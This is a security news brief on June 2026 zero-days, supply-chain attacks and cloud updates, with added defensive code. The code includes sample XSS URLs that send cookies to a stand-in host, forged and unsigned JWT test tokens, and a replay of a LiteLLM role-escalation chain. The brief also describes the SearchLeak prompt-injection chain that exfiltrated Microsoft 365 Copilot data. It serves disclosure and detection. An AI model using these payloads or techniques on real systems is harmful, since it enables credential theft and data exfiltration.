
Zero‑Days Patched, Private AWS Console, and Supply‑Chain Hits
Coverage: 15 Jun 2026 (UTC)
Patch and mitigation actions led the day, with fixes for an actively exploited Cisco SD‑WAN zero‑day, a chained takeover risk in LiteLLM, and a one‑click exfiltration path in Microsoft 365 Copilot. Attack activity also surfaced across research and web ecosystems, while cloud providers rolled out private console access, integrated DNS threat defenses, and new operations tooling. The updates emphasize rapid remediation, tighter identity and network boundaries, and improved visibility across multi‑account environments.
Patch and Mitigation Alerts
Cisco released a critical fix for CVE-2026-20262 in Catalyst SD‑WAN Manager (formerly vManage) after detecting active exploitation. The flaw sits in the web UI's file upload handling: an authenticated attacker with low privileges can craft HTTP requests that create or overwrite files on the appliance and, from there, escalate to root. It affects on‑premises, Cloud‑Pro, Cisco‑managed cloud, and FedRAMP deployments. Cisco published first fixed releases, indicators of compromise, and the log paths to inspect (including vmanage‑server, vmanage‑appserver, and serviceproxy‑access) for attempts to upload index.jsp and .war files. Administrators should update immediately and review those logs for signs of privilege escalation and persistence. Because the primitive is an arbitrary file write, a manager that shows exploitation attempts should be treated as potentially backdoored even after patching: the fix closes the upload path but does not remove anything an attacker has already dropped.
Obsidian detailed a chained exploitation path in LiteLLM that lets a low‑privilege internal_user escalate to proxy admin and execute server‑side code, yielding full takeover of the proxy. The chain spans CVE‑2026‑47101 (authorization bypass via unchecked allowed_routes), CVE‑2026‑47102 (unchecked writes to user_role), and CVE‑2026‑40217 (sandbox escape in the Custom Code Guardrail), with a combined CVSS of 9.9. At the end of the chain an attacker could recover the master and salt keys, database URLs, and every configured provider key, read all proxied prompts and responses, and, through callbacks, rewrite model outputs. BerriAI fixed the issues in v1.83.14‑stable (May 2). Recommended actions: upgrade, audit proxy_admin accounts, review and harden Custom Code Guardrails and callbacks, and rotate any exposed credentials and tokens, including the provider keys the proxy holds.
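The first two links of that chain, an allowed_routes list that is never enforced and a self‑service update that accepts a role field, are easy to model. The following is an added example written for this brief, not LiteLLM's code: the route names, field names, and the KeyRecord shape are assumptions, chosen only to show the weak pattern next to the hardened one.

```python
"""Illustrative escalation chain of the kind described above.

Added, simplified model (not LiteLLM's code): an API-key record carries a
role and an allowed_routes list, the proxy must enforce both on every
request, and a self-service user update must never accept role fields
from the caller.  Route and field names are assumptions.
"""
from dataclasses import dataclass, field

ADMIN_ROUTES = {"/key/generate", "/config/update"}          # assumed admin-only routes
PROTECTED_FIELDS = {"user_role", "allowed_routes", "max_budget"}


class Forbidden(Exception):
    pass


@dataclass
class KeyRecord:
    user_id: str
    user_role: str                                 # "proxy_admin" or "internal_user"
    allowed_routes: list = field(default_factory=list)
    user_alias: str = ""


# --- weak variant: role alone gates admin routes, allowed_routes is never
#     consulted, and the update handler copies every submitted field ---
def weak_authorize(key: KeyRecord, route: str) -> None:
    if route in ADMIN_ROUTES and key.user_role != "proxy_admin":
        raise Forbidden(f"{route} requires proxy_admin")


def weak_update_user(key: KeyRecord, body: dict) -> KeyRecord:
    for name, value in body.items():
        setattr(key, name, value)                  # user_role="proxy_admin" lands here
    return key


# --- hardened variant ---
def authorize(key: KeyRecord, route: str) -> None:
    # Deny by default: a key may only call routes it was explicitly granted,
    # and admin routes additionally require the proxy_admin role.
    if route not in key.allowed_routes:
        raise Forbidden(f"{route} not in allowed_routes")
    if route in ADMIN_ROUTES and key.user_role != "proxy_admin":
        raise Forbidden(f"{route} requires proxy_admin")


def update_user(key: KeyRecord, body: dict) -> KeyRecord:
    # Only proxy_admin may write protected fields; anyone else is rejected
    # outright rather than silently stripped, so the attempt shows up in logs.
    if key.user_role != "proxy_admin":
        rejected = PROTECTED_FIELDS & set(body)
        if rejected:
            raise Forbidden(f"cannot set {sorted(rejected)}")
    for name, value in body.items():
        setattr(key, name, value)
    return key


def run_chain(authorize_fn, update_fn) -> str:
    """Replay the escalation: self-update to proxy_admin, then mint a key."""
    key = KeyRecord("user-42", "internal_user", allowed_routes=["/chat/completions"])
    try:
        authorize_fn(key, "/user/update")
        update_fn(key, {"user_role": "proxy_admin"})
        authorize_fn(key, "/key/generate")
    except Forbidden as exc:
        return f"blocked: {exc}"
    return f"escalated: {key.user_role}"


def is_forbidden(fn, *args) -> bool:
    try:
        fn(*args)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    print("weak    :", run_chain(weak_authorize, weak_update_user))   # escalated: proxy_admin
    print("hardened:", run_chain(authorize, update_user))             # blocked: /user/update not in allowed_routes
```

The hardened update_user rejects a protected field rather than dropping it, which is the better choice for an audit trail: a non‑admin key that submits user_role is itself an indicator worth alerting on.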
Varonis disclosed SearchLeak (CVE‑2026‑42824), a chain enabling one‑click exfiltration from Microsoft 365 Copilot Enterprise. It combined a parameter‑to‑prompt injection through the Copilot Search q parameter, a rendering race that let raw HTML execute momentarily, and an SSRF in Bing's "Search by Image" that bypassed CSP by proxying outbound data through Bing. A victim clicking an attacker‑crafted link could cause Bing to fetch attacker‑controlled URLs server‑side, carrying out emails, files, calendar items, and time‑sensitive codes accessible via Microsoft Graph. Microsoft issued backend mitigations, so there is nothing for tenants to patch locally; organizations should confirm the service‑side updates have reached their tenant and monitor for Copilot search URLs carrying encoded HTML in the q parameter and for unusual requests to Bing image endpoints.
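The monitoring step is straightforward to automate once the q parameter is decoded the way the renderer would see it, including a second round of percent‑decoding for payloads that are double‑encoded to slip past naive filters. The helper below is an added example, not Varonis's or Microsoft's code; the host name copilot.example and the sample URLs are constructed, and SEARCH_HOSTS should be pointed at whatever host a tenant's Copilot search actually uses.

```python
"""Detection helper for the SearchLeak pattern: Copilot search URLs whose
q parameter carries (possibly double-encoded) HTML, script or an outbound URL.

Added example, not Varonis's or Microsoft's code.  copilot.example and the
sample URLs are constructed placeholders.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

SEARCH_HOSTS = frozenset({"copilot.example"})          # constructed placeholder

# Tags, inline event handlers, javascript: URLs, srcdoc attributes.
HTML_MARKERS = re.compile(r"<\s*/?\s*[a-z][a-z0-9-]*|\bon[a-z]+\s*=|javascript:|srcdoc\s*=", re.I)
URL_HOSTS = re.compile(r"(?:https?:)?//([a-z0-9.-]+)", re.I)

SAMPLE_URLS = [  # constructed for this example
    "https://copilot.example/search?q=quarterly+revenue+summary",
    # single-encoded <img src=x onerror="fetch('//evil.example/?c='+document.cookie)">
    "https://copilot.example/search?q=%3Cimg%20src%3Dx%20onerror%3D%22fetch('//evil.example/?c%3D'%2Bdocument.cookie)%22%3E",
    # double-encoded <script>fetch('https://evil.example')</script>
    "https://copilot.example/search?q=%253Cscript%253Efetch(%2527https%253A%252F%252Fevil.example%2527)%253C%252Fscript%253E",
    # HTML in q on a host we are not watching
    "https://intranet.example/search?q=%3Cb%3Ebold%3C%2Fb%3E",
]


def decode_fully(value: str, max_rounds: int = 3):
    """Percent-decode until stable; returns (text, extra_rounds_needed)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def query_findings(url: str, search_hosts=SEARCH_HOSTS) -> list:
    """Return the reasons a Copilot search URL looks like an injection attempt."""
    parts = urlsplit(url)
    if (parts.hostname or "").lower() not in search_hosts:
        return []
    reasons = []
    # parse_qs already applies one round of percent-decoding.
    for raw_q in parse_qs(parts.query).get("q", []):
        text, extra_rounds = decode_fully(raw_q)
        if extra_rounds:
            reasons.append("double-percent-encoding")
        if HTML_MARKERS.search(text):
            reasons.append("html-or-script-in-q")
        hosts = {h.lower() for h in URL_HOSTS.findall(text)}
        if hosts - search_hosts:
            reasons.append("external-url-in-q")
    return reasons


def scan(urls, search_hosts=SEARCH_HOSTS) -> dict:
    """Map each flagged URL to its reasons; clean URLs are omitted."""
    return {u: r for u in urls if (r := query_findings(u, search_hosts))}


if __name__ == "__main__":
    for url, reasons in scan(SAMPLE_URLS).items():
        print(", ".join(reasons), "<-", url[:60])
```

Feed it the URL column of a proxy or CASB export; a hit on "external-url-in-q" together with "html-or-script-in-q" is the shape of the SearchLeak lure, while "double-percent-encoding" on its own is rare in legitimate searches and worth a look.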
A critical SimpleHelp vulnerability (CVE‑2026‑48558) lets unauthenticated attackers create privileged Technician accounts on servers that use OpenID Connect with group‑authenticated logins enabled. Because the server insufficiently validated identity assertions, an attacker could present a crafted assertion and obtain a technician account without ever completing MFA. The issue is patched in 5.5.16 and 6.0RC2; on unpatched servers it can yield remote access to managed endpoints and script execution. Where upgrades are delayed, restrict technician login sources with IP allowlists and monitor for unexpected technician registrations, unfamiliar email addresses, and related log entries, while scheduling prompt remediation.
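Auto‑provisioning a privileged account from an OIDC assertion is only as safe as the checks applied to that assertion. The example below is added for this brief and is not SimpleHelp's code: it contrasts a check that trusts the group claim as received with one that verifies signature, issuer, audience, expiry, authentication method and group membership before provisioning. To stay self‑contained it signs ID tokens with HS256 and a shared secret; a real deployment verifies the provider's RS256/ES256 signature against its JWKS. The issuer, audience, group name and keys are constructed.

```python
"""Validating an OIDC identity assertion before auto-provisioning a
privileged (technician) account.

Added example, not SimpleHelp's code.  HS256 with a shared secret stands in
for the provider's asymmetric signature; issuer, audience, group and key
values are constructed.
"""
import base64
import hashlib
import hmac
import json

IDP_KEY = b"constructed-idp-signing-secret"
ATTACKER_KEY = b"anything-the-attacker-likes"
ISSUER = "https://idp.example"
AUDIENCE = "simplehelp-server"            # this server's client_id at the IdP
TECH_GROUP = "technicians"
NOW = 1_800_000_000                       # fixed clock for determinism


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_token(claims: dict, key: bytes, alg: str = "HS256") -> str:
    """Mint a compact JWT; alg='none' yields an unsigned token."""
    header = _b64url(json.dumps({"alg": alg, "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}".encode()
    sig = b"" if alg == "none" else hmac.new(key, signing_input, hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def weak_provision(token: str) -> bool:
    """Trusts the group claim without verifying anything about the token."""
    claims = json.loads(_b64url_decode(token.split(".")[1]))
    return TECH_GROUP in claims.get("groups", [])


def check_assertion(token: str, key: bytes = IDP_KEY, now: int = NOW,
                    require_mfa: bool = True) -> str:
    """Return 'ok' or the first reason the assertion must not provision a technician."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        claims = json.loads(_b64url_decode(payload_b64))
    except ValueError:                                    # covers base64 and JSON errors
        return "malformed token"
    if header.get("alg") != "HS256":                      # allowlist; never honour 'none'
        return "unexpected alg"
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        return "bad signature"
    if claims.get("iss") != ISSUER:
        return "issuer mismatch"
    aud = claims.get("aud")
    if AUDIENCE not in (aud if isinstance(aud, list) else [aud]):
        return "audience mismatch"
    if not isinstance(claims.get("exp"), int) or claims["exp"] <= now:
        return "expired"
    if require_mfa and "mfa" not in claims.get("amr", []):  # RFC 8176 method references
        return "no mfa"
    if TECH_GROUP not in claims.get("groups", []):
        return "not in technician group"
    return "ok"


def _claims(**overrides) -> dict:
    base = {"iss": ISSUER, "aud": AUDIENCE, "sub": "alice", "exp": NOW + 600,
            "amr": ["pwd", "mfa"], "groups": [TECH_GROUP]}
    base.update(overrides)
    return base


# Constructed assertions: one legitimate, the rest are what an attacker would try.
TOKENS = {
    "legit":     make_token(_claims(), IDP_KEY),
    "forged":    make_token(_claims(sub="mallory"), ATTACKER_KEY),
    "unsigned":  make_token(_claims(sub="mallory"), b"", alg="none"),
    "other-app": make_token(_claims(aud="some-other-app"), IDP_KEY),
    "no-mfa":    make_token(_claims(amr=["pwd"]), IDP_KEY),
    "not-tech":  make_token(_claims(groups=["staff"]), IDP_KEY),
}

if __name__ == "__main__":
    for name, tok in TOKENS.items():
        print(f"{name:10} weak={weak_provision(tok)!s:5} hardened={check_assertion(tok)}")
```

The audience check matters as much as the signature: a token the IdP legitimately issued for a different application still carries a valid signature and the right groups, and a relying party that does not pin aud will happily provision from it.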
Intrusions and Supply‑Chain Compromises
Sansec reported a supply‑chain attack that injected malicious JavaScript into three Awesome Motive WordPress plugins (PushEngage, OptinMonster, and TrustPulse), affecting downstream sites that loaded the altered files. The payload activated only for logged‑in administrators; it created a rogue admin account, installed a stealth backdoor plugin, and exfiltrated credentials to a look‑alike tidio[.]cc domain. Exposure windows varied by plugin across June 12–13, and having loaded the script indicates exposure rather than confirmed compromise. Recommended actions nonetheless start from assuming compromise if the affected scripts were loaded: conduct full server‑side forensics, hunt for stealth plugin folders and unexpected admin accounts, review logs for connections to the listed domains and IPs, and rotate credentials and WordPress salts so that any sessions and cookies the attacker captured stop working.
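The "unexpected admin accounts" hunt reduces to one query against wp_users and wp_usermeta, filtered by registration time and email domain. The block below is an added example, not Sansec's tooling: it runs the SQL a responder would point at the live MySQL database, here against an in‑memory SQLite copy seeded with constructed rows. The wp_ table prefix, the example.org domain and the June 12–14 window are assumptions.

```python
"""Hunting for rogue WordPress administrators after a plugin compromise:
admin accounts created inside the exposure window or with an email
outside the organisation's domain.

Added example, not Sansec's tooling.  SQLite stands in for MySQL; rows,
prefix, domain and window are constructed assumptions.
"""
import sqlite3

SCHEMA = """
CREATE TABLE wp_users (
    ID INTEGER PRIMARY KEY, user_login TEXT, user_email TEXT, user_registered TEXT);
CREATE TABLE wp_usermeta (
    umeta_id INTEGER PRIMARY KEY, user_id INTEGER, meta_key TEXT, meta_value TEXT);
"""

# Constructed sample data.  WordPress stores roles as a PHP-serialized array
# under <prefix>capabilities, e.g. a:1:{s:13:"administrator";b:1;}
SAMPLE_USERS = [
    (1, "site-owner",  "owner@example.org",    "2024-03-01 09:12:44"),
    (2, "editor-jane", "jane@example.org",     "2025-07-19 14:03:10"),
    (3, "wp-svc-sync", "sync@mailbox.example", "2026-06-12 23:41:07"),   # rogue admin
    (4, "contractor",  "dev@agency.example",   "2025-11-02 08:30:00"),   # external, pre-window
]
SAMPLE_META = [
    (1, 'a:1:{s:13:"administrator";b:1;}'),
    (2, 'a:1:{s:6:"editor";b:1;}'),
    (3, 'a:1:{s:13:"administrator";b:1;}'),
    (4, 'a:1:{s:13:"administrator";b:1;}'),
]


def load_sample() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO wp_users VALUES (?,?,?,?)", SAMPLE_USERS)
    conn.executemany(
        "INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?, 'wp_capabilities', ?)",
        SAMPLE_META)
    return conn


def list_admins(conn: sqlite3.Connection, prefix: str = "wp_") -> list:
    """Every account holding the administrator role, newest first."""
    if not prefix.replace("_", "").isalnum():           # prefix is interpolated, so validate it
        raise ValueError("bad table prefix")
    sql = f"""
        SELECT u.ID, u.user_login, u.user_email, u.user_registered
        FROM {prefix}users u
        JOIN {prefix}usermeta m ON m.user_id = u.ID
        WHERE m.meta_key = '{prefix}capabilities'
          AND m.meta_value LIKE '%"administrator"%'
        ORDER BY u.user_registered DESC"""
    return conn.execute(sql).fetchall()


def suspicious_admins(conn, window_start, window_end, org_domain, prefix="wp_") -> list:
    """Admins to investigate, each with the reasons that flagged them."""
    flagged = []
    for uid, login, email, registered in list_admins(conn, prefix):
        reasons = []
        if window_start <= registered < window_end:       # ISO timestamps sort lexically
            reasons.append("registered in exposure window")
        if not email.lower().endswith("@" + org_domain.lower()):
            reasons.append("email outside org domain")
        if reasons:
            flagged.append({"id": uid, "login": login, "email": email,
                            "registered": registered, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    db = load_sample()
    for hit in suspicious_admins(db, "2026-06-12 00:00:00", "2026-06-14 00:00:00", "example.org"):
        print(hit["login"], hit["registered"], "|", "; ".join(hit["reasons"]))
```

Run the same SELECT against the production database with the site's real prefix (check $table_prefix in wp-config.php); the registration timestamp is the strongest signal, but an account can be backdated by anyone with database access, so corroborate hits against web server logs from the exposure window rather than treating a clean result as proof of absence.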
Google Threat Intelligence Group documented a long‑running espionage operation by a China‑linked cluster (UNC6508) that targeted exposed REDCap instances at a North American medical research institution. The operation used a bespoke malware suite, Infinitered, together with credential harvesting via trojanized login pages and a backdoor controlled through HTTP cookies that could execute commands, transfer files, and query databases. The attackers also abused cloud email "content compliance rules" to auto‑BCC matching documents to an external Gmail account for covert exfiltration. GTIG shared YARA rules and IoCs and recommended updating REDCap, removing legacy deployments, enabling MFA/2SV and device‑bound session credentials, and scanning for Infinitered indicators.
Palo Alto Networks reported limited in‑the‑wild exploitation of CVE‑2026‑0257, an authentication bypass in the GlobalProtect portal and gateway components of PAN‑OS that can let unauthenticated actors establish VPN sessions. The vendor published indicators and client configuration values for defenders to search, and CISA added the issue to the KEV catalog with a federal remediation deadline. Organizations should apply the available mitigations and review gateway connection logs for matches to the provided IoCs.
AWS: Private Access, DNS Protections, and Resilience
AWS introduced Console Private Access, which lets users reach the AWS Management Console from VPCs with no internet connectivity by way of AWS PrivateLink and VPC endpoints. Administrators can attach endpoint policies that limit which accounts and organizations are reachable through the endpoint, while IAM, Service Control, and Resource Control policies continue to apply as before. The feature is available across commercial Regions and billed through endpoint usage and data processing. It shrinks the network attack surface for console access and helps meet network‑isolation requirements in regulated and highly controlled environments; note that it constrains the path to the console rather than the credentials used on it, so it complements strong identity controls rather than replacing them.
In preview, AWS integrated Palo Alto Networks Advanced DNS Security with Route 53 Resolver DNS Firewall, allowing administrators to subscribe via an embedded Marketplace widget and apply threat categories such as C2, Malware, Phishing, and Newly Registered Domains. The integration brings fast‑flux protection, DNS tunneling and rebinding safeguards, and DGA detection to DNS queries from VPCs and from hybrid environments routed through Resolver Endpoints. It supports centralized governance across accounts via RAM, Route 53 Profiles, and Firewall Manager, with findings in Security Hub and logs exportable to S3, Firehose, or CloudWatch. The PANW rule additions incur no extra DNS Firewall charge, and the Marketplace subscription is free during the preview.
For data resilience and distribution, AWS enabled on‑demand cross‑Region replication for FSx OpenZFS across both default and opt‑in Regions. Customers can transfer incremental point‑in‑time snapshots to expand disaster recovery patterns, cross‑account movement, and lower‑latency access for distributed users. AWS notes no additional FSx charge specific to on‑demand replication, though standard inter‑Region or cross‑account data transfer fees apply; management is available through the FSx console and documentation.
Observability and operations tooling also advanced. CloudWatch Query Studio is generally available, offering a unified console workspace to run PromQL and Metrics Insights queries across AWS‑vended and OpenTelemetry metrics with cross‑account and cross‑Region selectors, visualization options, and dashboard integration (not yet available in the UAE, Bahrain, and Israel (Tel Aviv) Regions). In parallel, the DevOps Agent added custom SRE agents, bring‑your‑own sub‑agents, and headless access via MCP and A2A. Teams can schedule recurring jobs, integrate with existing tools and coding assistants, extend capabilities via Bedrock or third‑party frameworks, and monitor task quality with new dashboards, expanding automation for SRE workflows; as with any agent given operational reach, the credentials it runs under deserve the same least‑privilege scoping as a human operator's.
GovCloud, AI Agents, and Security Practice
ECS Express Mode is now available in AWS GovCloud (US‑East and US‑West). It automates common operational tasks for containerized apps while preserving full customer control, supports public or private HTTPS endpoints with an AWS‑provided domain, scales with traffic, and can consolidate up to 25 services behind a single ALB using rule‑based routing. Resources remain in the customer’s account and the feature carries no extra charge beyond underlying AWS usage, supporting rapid deployments in controlled environments.
Google introduced a broad set of agents and developer tools across its Agentic Data Cloud, bringing conversational analytics to BigQuery Studio and lakehouse environments and adding agents for data engineering (GA), data science (preview), database observability (preview), dashboards (preview), and cross‑source insights and deep research (previews). Developer offerings include a Data Agent Kit (preview), Managed MCP Servers (GA/preview), MCP Toolbox 1.0 (GA), and QueryData (preview) for high‑accuracy natural‑language‑to‑SQL. The announcement emphasizes grounding in enterprise context, unified governance, and improved access controls to reduce AI‑related risk.
Sharing operational lessons in CISO Perspectives, Google Cloud's CISO outlined four pillars for vulnerability management: Prepare, Scan and Prioritize, Remediate, and Monitor. The approach covers reducing attack surface; AI‑assisted scanning at scale with prioritization by reachability and blast radius; centralized tracking with risk‑based rollout and autonomous patching under human review; and continuous monitoring with feedback loops and automated containment. The blueprint highlights measured adoption of AI to accelerate finding and fixing vulnerabilities while maintaining safety through context‑aware models and robust rollbacks.